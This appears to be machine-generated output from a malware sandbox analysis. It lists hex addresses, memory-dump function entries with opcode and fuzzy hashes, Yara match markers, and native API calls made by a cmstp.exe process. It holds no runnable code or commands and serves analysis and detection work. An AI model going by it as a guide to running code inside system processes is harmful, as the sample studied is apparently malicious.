                          0x0041c38e
                          0x0041b8c6
                          0x0041b8d2
                          0x0041b8d8
                          0x0041b8dd
                          0x0041b8de
                          0x0041b8e5
                          0x0041b8e8
                          0x0041b8ef
                          0x0041b8f5
                          0x0041c394
                          0x0041c394
                          0x0041c39e
                          0x0041c3a5
                          0x0041c3ac
                          0x0041c3ad
                          0x0041c3b2
                          0x0041c3b7
                          0x0041c3bd
                          0x0041c3be
                          0x0041c3c4
                          0x0041c3ce
                          0x0041c3d4
                          0x0041c3d4
                          0x0041c3d4
                          0x0041c3da
                          0x0041c3db
                          0x0041c3e1
                          0x0041c3e8
                          0x0041c3e9
                          0x0041c3ea
                          0x0041c3fc
                          0x0041c402
                          0x0041c403
                          0x00000000
                          0x0041c409
                          0x0041c409
                          0x0041c410
                          0x00000000
                          0x0041c416
                          0x0041c41c
                          0x0041c422
                          0x0041c438
                          0x0041c439
                          0x0041c43a
                          0x0041c440
                          0x0041c446
                          0x0041c44c
                          0x0041c452
                          0x0041c459
                          0x0041c45a
                          0x0041c460
                          0x0041c466
                          0x0041c472
                          0x00000000
                          0x0041c478
                          0x0041c478
                          0x0041c488
                          0x0041c48e
                          0x0041c494
                          0x0041c49b
                          0x0041c4ab
                          0x0041c4b2
                          0x0041c4bc
                          0x0041c4c2
                          0x0041c4c2
                          0x0041c4c2
                          0x0041c4c8
                          0x0041c4ce
                          0x0041c4d5
                          0x0041c4db
                          0x0041c4e1
                          0x0041c4ed
                          0x0041c4f3
                          0x00000000
                          0x0041c4f9
                          0x0041c4f9
                          0x0041c505
                          0x00000000
                          0x0041c50b
                          0x0041c50b
                          0x0041c510
                          0x0041c516
                          0x0041c51c
                          0x0041c51f
                          0x0041c525
                          0x0041c527
                          0x0041c52d
                          0x0041c533
                          0x0041c540
                          0x0041c543
                          0x0041c556
                          0x0041c55c
                          0x0041c561
                          0x0041c567
                          0x0041c568
                          0x0041c569
                          0x0041c56b
                          0x0041c572
                          0x0041c577
                          0x0041c578
                          0x0041c57e
                          0x0041c585
                          0x0041c588
                          0x0041c58e
                          0x0041c594
                          0x00000000
                          0x0041c59a
                          0x0041c59a
                          0x0041c5a4
                          0x0041c5aa
                          0x0041c5b0
                          0x0041c5b1
                          0x00000000
                          0x0041c5b7
                          0x0041c5b7
                          0x0041c5c3
                          0x0041c5c5
                          0x0041c5cf
                          0x0041c5d6
                          0x0041c5dd
                          0x0041c5e3
                          0x0041c5ea
                          0x0041c5ec
                          0x0041c5f8
                          0x00000000
                          0x0041c5fe
                          0x0041c5fe
                          0x0041c614
                          0x0041c61a
                          0x0041c620
                          0x0041c623
                          0x00000000
                          0x0041c629
                          0x0041c629
                          0x0041c633
                          0x0041c634
                          0x0041c63b
                          0x00000000
                          0x0041c641
                          0x0041c641
                          0x0041c647
                          0x0041c653
                          0x0041c659
                          0x0041c65a
                          0x0041c65b
                          0x0041c661
                          0x0041c662
                          0x0041c668
                          0x0041c66e
                          0x0041c674
                          0x0041c676
                          0x0041c67c
                          0x0041c682
                          0x0041c683
                          0x0041c68a
                          0x0041c690
                          0x0041c697
                          0x0041c6a4
                          0x0041c6aa
                          0x00000000
                          0x0041c6b0
                          0x0041c6b0
                          0x0041c6b6
                          0x0041c6b6
                          0x0041c6b6
                          0x0041c6bc
                          0x0041c6c2
                          0x0041c6c8
                          0x0041c6ce
                          0x0041c6d5
                          0x0041c6dd
                          0x0041c6e3
                          0x00000000
                          0x0041c6e9
                          0x0041c6e9
                          0x0041c6f3
                          0x0041c6f9
                          0x0041c6ff
                          0x0041c705
                          0x0041c70b
                          0x0041c714
                          0x0041c71e
                          0x0041c724
                          0x0041c727
                          0x0041c728
                          0x0041c72e
                          0x0041c735
                          0x0041c73b
                          0x0041c741
                          0x0041c746
                          0x0041c74d
                          0x0041c75a
                          0x0041c766
                          0x0041c76c
                          0x0041c775
                          0x0041c77d
                          0x0041c783
                          0x0041c784
                          0x0041c790
                          0x0041c793
                          0x0041c79f
                          0x0041c7a5
                          0x0041c7b1
                          0x0041c7b4
                          0x0041c7b4
                          0x0041c7b4
                          0x0041c7ba
                          0x0041c7c0
                          0x0041c7c6
                          0x0041c7cc
                          0x0041c7d2
                          0x0041c7d8
                          0x0041c7db
                          0x0041c7e1
                          0x0041c7ed
                          0x0041c7f3
                          0x0041c7f9
                          0x0041c7ff
                          0x0041c805
                          0x0041c80b
                          0x0041c811
                          0x0041c817
                          0x0041c818
                          0x00000000
                          0x0041c81e
                          0x0041c824
                          0x0041c82b
                          0x0041c831
                          0x0041c837
                          0x0041c838
                          0x0041c83f
                          0x0041c842
                          0x0041c84c
                          0x0041c84d
                          0x0041c84d
                          0x0041c84d
                          0x0041c859
                          0x00000000
                          0x0041c85f
                          0x0041c85f
                          0x0041c865
                          0x0041c86b
                          0x00000000
                          0x0041c871
                          0x0041c871
                          0x0041c877
                          0x0041c87d
                          0x00000000
                          0x0041c883
                          0x0041c883
                          0x0041c88d
                          0x0041c893
                          0x0041c899
                          0x0041c8a0
                          0x0041c8a7
                          0x0041c8ae
                          0x0041c8b4
                          0x0041c8bd
                          0x0041c8bd
                          0x0041c8bd
                          0x0041c8c3
                          0x00000000
                          0x0041c8c9
                          0x0041c8c9
                          0x0041c8d3
                          0x0041c8d4
                          0x0041c8da
                          0x0041c8e0
                          0x0041c8e1
                          0x0041c8e7
                          0x0041c8ed
                          0x0041c8f3
                          0x0041c8f4
                          0x0041c8fa
                          0x0041c900
                          0x0041c906
                          0x0041c90a
                          0x00000000
                          0x0041b8c6
                          0x0041b8c6
                          0x0041b8c6
                          0x0041b8c6
                          0x0041b8c6
                          0x0041b8c6
                          0x0041b8c6
                          0x0041b8c6
                          0x00000000
                          0x00000000
                          0x0041b8fe
                          0x0041b904
                          0x0041b910
                          0x0041b91c
                          0x0041b922
                          0x0041b922
                          0x0041b92a
                          0x0041b930
                          0x0041b936
                          0x0041b948
                          0x0041b94f
                          0x0041b956
                          0x0041b962
                          0x0041b969
                          0x0041b96f
                          0x0041b975
                          0x0041b97c
                          0x0041b982
                          0x0041b988
                          0x0041b994
                          0x0041b99b
                          0x0041b9a0
                          0x0041b9a6
                          0x0041b9b2
                          0x0041b9c3
                          0x0041b9c9
                          0x0041b9ca
                          0x0041b9d0
                          0x0041b9d6
                          0x0041b9d7
                          0x0041b9dd
                          0x0041b9e4
                          0x0041b9eb
                          0x0041b9f7
                          0x0041b9fd
                          0x0041ba03
                          0x0041ba1f
                          0x0041ba26
                          0x0041ba2c
                          0x0041ba3f
                          0x0041ba4c
                          0x0041ba53
                          0x0041ba5a
                          0x0041ba61
                          0x0041ba6d
                          0x0041ba73
                          0x0041ba73
                          0x0041ba73
                          0x0041ba79
                          0x0041ba86
                          0x0041ba8c
                          0x0041ba8c
                          0x0041ba8c
                          0x0041ba8c
                          0x0041ba98
                          0x0041baa2
                          0x0041baa3
                          0x0041baa9
                          0x0041bab1
                          0x0041bab7
                          0x0041bab8
                          0x0041babe
                          0x0041babe
                          0x0041babe
                          0x0041babe
                          0x0041bada
                          0x0041badb
                          0x0041bae1
                          0x0041baed
                          0x0041baf4
                          0x0041bafb
                          0x0041bb01
                          0x0041bb08
                          0x0041bb0e
                          0x0041bb14
                          0x0041bb15
                          0x0041bb1b
                          0x0041bb21
                          0x0041bb27
                          0x0041bb2d
                          0x0041bb3c
                          0x0041bb3d
                          0x0041bb49
                          0x0041bb53
                          0x0041bb54
                          0x0041bb60
                          0x0041bb66
                          0x0041bb6d
                          0x0041bb6d
                          0x0041bb79
                          0x0041bb88
                          0x0041bb8e
                          0x0041bba4
                          0x0041bbaa
                          0x0041bbb3
                          0x0041bbb9
                          0x0041bbc0
                          0x0041bbde
                          0x0041c910
                          0x0041c910
                          0x0041c91a
                          0x0041c920
                          0x0041c923
                          0x0041c92a
                          0x0041c92c
                          0x0041c92c
                          0x0041c90a
                          0x0041c8c3
                          0x0041c87d
                          0x0041c86b
                          0x0041c859
                          0x0041c818
                          0x0041c6e3
                          0x0041c6aa
                          0x0041c63b
                          0x0041c623
                          0x0041c5f8
                          0x0041c5b1
                          0x0041c594
                          0x0041c505
                          0x0041c4f3
                          0x0041c472
                          0x0041c410
                          0x0041c403

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: O|
                          • API String ID: 0-3234000161
                          • Opcode ID: 61964e9cc1c1679b20fe4d399114f3932cf786ed078dae3c996fe2d0bd1dce44
                          • Instruction ID: 819dcfb4bbe5de97ccdb09870644a33bfaf2d7f8a57f33fad0b5f2968f5db1ed
                          • Opcode Fuzzy Hash: 61964e9cc1c1679b20fe4d399114f3932cf786ed078dae3c996fe2d0bd1dce44
                          • Instruction Fuzzy Hash: 6322DE72908784CFEB06DF38D98AB823FB5F752724B08425ED9A0435D2D734256ADF89
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402FB0, Relevance: .4, Instructions: 435COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                          • Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
                          • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                          • Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0041BBDF, Relevance: .4, Instructions: 393COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f8c92fc58d9334ba0d5daf5b44731f0e50d642d0272a8192dd6398c1ab98ba6d
                          • Instruction ID: ca2ab7d5f663cf1436536e83df31e46622fe2f6572f9af8342216d21fc2ff008
                          • Opcode Fuzzy Hash: f8c92fc58d9334ba0d5daf5b44731f0e50d642d0272a8192dd6398c1ab98ba6d
                          • Instruction Fuzzy Hash: 7412CD32919780CFE716DF38D98AB413FB5FB42720B08429ED5A193581DB3825A9DF89
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0041C12C, Relevance: .3, Instructions: 267COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9228fb4cc7cfbad0ca60b92a6bd57a190a52649f9faf2634d1dbdb6a6c1d77e3
                          • Instruction ID: 958b3fcb276e02b0382108a732dd0ede489cad60bdce6d647e2e045fbb4d858a
                          • Opcode Fuzzy Hash: 9228fb4cc7cfbad0ca60b92a6bd57a190a52649f9faf2634d1dbdb6a6c1d77e3
                          • Instruction Fuzzy Hash: 2DD1AC32919781CFE717CF38D986B813FB1FB46720B08429ED9A183591DB342596DF89
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0041CFD2, Relevance: .2, Instructions: 170COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bde2d01e35fc27a4372176955e67ad4076f33227a3957ff72c7d710f5b58339f
                          • Instruction ID: 55383111162be2e9c31f8d2f72d144523d57aad88e27cadf0193d01df58874a1
                          • Opcode Fuzzy Hash: bde2d01e35fc27a4372176955e67ad4076f33227a3957ff72c7d710f5b58339f
                          • Instruction Fuzzy Hash: A6813432558795CFD309CF38D9CAB913BB2F752324B58434EC5A243AD6C738654ACB88
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402D90, Relevance: .2, Instructions: 165COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                          • Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
                          • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                          • Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402D89, Relevance: .2, Instructions: 161COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d636cb4edb09561195d9df4a28d72938e2fec9507bb8540033b3ad3022e58818
                          • Instruction ID: 88ca771990e6aa8a0b53704918f60eff2045e726bdb6f7804b86a2ab9ea299b1
                          • Opcode Fuzzy Hash: d636cb4edb09561195d9df4a28d72938e2fec9507bb8540033b3ad3022e58818
                          • Instruction Fuzzy Hash: BA5183B3E14A214BD318CF09CD40631B792EFD8312B5B81BEDD199B397CA74A9529A90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0041CBC5, Relevance: .2, Instructions: 160COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7c1ddfd161202dca6456ae30a7915096965351df7bc57554d9fc46cde3af63dd
                          • Instruction ID: 1826de047fac14eb6b2e2e3970c010f5ad5d3ca3568718f49d24c51c2cf68de8
                          • Opcode Fuzzy Hash: 7c1ddfd161202dca6456ae30a7915096965351df7bc57554d9fc46cde3af63dd
                          • Instruction Fuzzy Hash: D27123769587D0DFEB06EF38E8DA7423F75E746720B08068DC9A25B1D2D364206ACB85
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0041B8C6, Relevance: .1, Instructions: 148COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 318b028ea8e903cc675eae846110c4a673b73494d162232e5232c91af36ae66f
                          • Instruction ID: 7421bc0d78cbaed866428f318d5c52600f84fd7f70a9fc74a3674f55f3fce7a1
                          • Opcode Fuzzy Hash: 318b028ea8e903cc675eae846110c4a673b73494d162232e5232c91af36ae66f
                          • Instruction Fuzzy Hash: 90716932909780CFEB16CF38D986B413FB5FB52710B08869ED96193581EB382599CF89
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00401030, Relevance: .1, Instructions: 108COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                          • Instruction ID: 9ce4faf4bd6c29c48d5e9242fd1ccb7de96948774e055271f7c113e60250bd75
                          • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                          • Instruction Fuzzy Hash: 203180116596F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Analysis Process: cmstp.exe PID: 1688 Parent PID: 3424 cmstp.exeCOMMON

                          Executed Functions

                          Function 02D485E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02D43BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02D43BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02D4862D
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Offset: 02D30000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID: .z`
                          • API String ID: 823142352-1441809116
                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                          • Instruction ID: 9ec832adf356a64a251f57fd60751e68535458cdbdc095af271ab1c31f78590b
                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                          • Instruction Fuzzy Hash: F8F0B2B2204208ABCB08CF89DC94EEB77ADAF8C754F158248FA0D97240C630E811CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02D4868A, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtReadFile.NTDLL(02D43D72,5E972F65,FFFFFFFF,02D43A31,?,?,02D43D72,?,02D43A31,FFFFFFFF,5E972F65,02D43D72,?,00000000), ref: 02D486D5
                          Memory Dump Source
                          • Source File: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Offset: 02D30000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 8773df1c21988543cd7d3648518ae3e1e1d2f9c2ae09b548a3286a9ab79d0a02
                          • Instruction ID: 921d4fd5dddb8d15308a658434dc8a0ee90ef777adca0d76c002c0e0941a52fa
                          • Opcode Fuzzy Hash: 8773df1c21988543cd7d3648518ae3e1e1d2f9c2ae09b548a3286a9ab79d0a02
                          • Instruction Fuzzy Hash: AAF0E7B6200109AFCB14CF99DC90EEB77A9AF8C354F158248FA4DA7241C630E811CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02D48690, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtReadFile.NTDLL(02D43D72,5E972F65,FFFFFFFF,02D43A31,?,?,02D43D72,?,02D43A31,FFFFFFFF,5E972F65,02D43D72,?,00000000), ref: 02D486D5
                          Memory Dump Source
                          • Source File: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Offset: 02D30000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                          • Instruction ID: d12358dd6510e68291dab8b68ab575e60312694a907f8c6259062f72a9d29316
                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                          • Instruction Fuzzy Hash: 12F0A4B2200208ABCB14DF89DC94EEB77ADEF8C754F158248BA1D97241DA30E911CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02D487BB, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02D32D11,00002000,00003000,00000004), ref: 02D487F9
                          Memory Dump Source
                          • Source File: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Offset: 02D30000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: AllocateMemoryVirtual
                          • String ID:
                          • API String ID: 2167126740-0
                          • Opcode ID: dccf2c4baaf90e8a714809c0892d6d0836fd8d611acc67b794c84f78f116f1d1
                          • Instruction ID: 77ea183edd23d34a32595ec3e600cbc731fde34fd665d76df6afcee7f042de92
                          • Opcode Fuzzy Hash: dccf2c4baaf90e8a714809c0892d6d0836fd8d611acc67b794c84f78f116f1d1
                          • Instruction Fuzzy Hash: ACF0F8B2200208ABDB14DF89DC90EA777ADEF88754F158558BA0997341CA31F910CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02D487C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02D32D11,00002000,00003000,00000004), ref: 02D487F9
                          Memory Dump Source
                          • Source File: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Offset: 02D30000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: AllocateMemoryVirtual
                          • String ID:
                          • API String ID: 2167126740-0
                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                          • Instruction ID: c538d39c10e718203065cb673ff71e618b307ab3eaa3dfd560552b1b55ac80f9
                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                          • Instruction Fuzzy Hash: 13F015B2200208ABCB14DF89CC80EEB77ADEF88750F118148FE0897241C630F910CBB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02D4870A, Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtClose.NTDLL(02D43D50,?,?,02D43D50,00000000,FFFFFFFF), ref: 02D48735
                          Memory Dump Source
                          • Source File: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Offset: 02D30000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: 0306b407cce8113009bb78d1bf265a71960c333543906170358d8f5b0d82a10d
                          • Instruction ID: d9c5f74c37209735412ac66572b00173d59caa49b9f42a52d92e6f9dbbaa0ef7
                          • Opcode Fuzzy Hash: 0306b407cce8113009bb78d1bf265a71960c333543906170358d8f5b0d82a10d
                          • Instruction Fuzzy Hash: 22E08C32200214BBD710EB98CC88EA777A8EF84750F154098FA099B242C630FA00CAE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02D48710, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtClose.NTDLL(02D43D50,?,?,02D43D50,00000000,FFFFFFFF), ref: 02D48735
                          Memory Dump Source
                          • Source File: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Offset: 02D30000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                          • Instruction ID: 135919e10e2d01fb5deef6ba60c01ddd28356b791cd7b34758de4d07683f22f3
                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                          • Instruction Fuzzy Hash: E6D012752002146BD710EB99CC45ED7775DEF44750F154455BA185B241C530FA00C6E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048B9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: f1f187d30f17e03dfa25f9820175541542e685f0ba73f096dce43364ea8ea566
                          • Instruction ID: 402ff4b54de5457eab60f68aed897a759efb37095a43a567d6c29ab100077a70
                          • Opcode Fuzzy Hash: f1f187d30f17e03dfa25f9820175541542e685f0ba73f096dce43364ea8ea566
                          • Instruction Fuzzy Hash: 12900261242041527645B15944045074046A7E0285B91C526A2409AA0C8576E85AE661
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048B9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 12163b0663a185e591bf149b077920e850b30bd28cb68934c62ab06f501fafed
                          • Instruction ID: e1f89b3d760eae7afaa43bac4b8811107b986eb07d8e6d8357f7e70a4dfc7206
                          • Opcode Fuzzy Hash: 12163b0663a185e591bf149b077920e850b30bd28cb68934c62ab06f501fafed
                          • Instruction Fuzzy Hash: 8390027120100413F21171594504707004997D0285F91C926A14196A8D96A6D956B161
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048B99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 28f8160dbcce278216b03af2453d972fa21d49cde0a75590d6411397aff6913e
                          • Instruction ID: e36499c6b028680cb0338379adb4696845044a5bd049a73a32227fa10aabceba
                          • Opcode Fuzzy Hash: 28f8160dbcce278216b03af2453d972fa21d49cde0a75590d6411397aff6913e
                          • Instruction Fuzzy Hash: A79002A134100442F20071594414B060045D7E1345F51C529E20596A4D8669DC567166
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048B95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 7dd649dcec2f8d62407cbd3fdee66f89ba6758a47e36a1a039cd4efd9f81fd43
                          • Instruction ID: 0e08a52fb89bc14d5d5470800ecf897120ef660837a57ea3d1660afb4de9664c
                          • Opcode Fuzzy Hash: 7dd649dcec2f8d62407cbd3fdee66f89ba6758a47e36a1a039cd4efd9f81fd43
                          • Instruction Fuzzy Hash: C19002A120200003620571594414616404A97E0245F51C535E20096E0DC575D8957165
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048B9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: cc342aee83ec27c0475f110a2218e8e4c79e56d9d50472d5e79e0091290bf28a
                          • Instruction ID: 008780202e30e5bc0d21e7a57481d12045aa8a014a82f8893430fed6a7bf81f3
                          • Opcode Fuzzy Hash: cc342aee83ec27c0475f110a2218e8e4c79e56d9d50472d5e79e0091290bf28a
                          • Instruction Fuzzy Hash: 179002B120100402F24071594404746004597D0345F51C525A60596A4E86A9DDD976A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048B9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: ff7492dfbd676754755b418bfea2b821494736f1e2f47b1a93c3079d9b8d8ddc
                          • Instruction ID: 6639fe15766aba551058e7ad68d35820167cbdd3ffe8f5fcfafb523971e53b09
                          • Opcode Fuzzy Hash: ff7492dfbd676754755b418bfea2b821494736f1e2f47b1a93c3079d9b8d8ddc
                          • Instruction Fuzzy Hash: 94900265211000032205B5590704507008697D5395751C535F200A6A0CD671D8656161
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048B96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
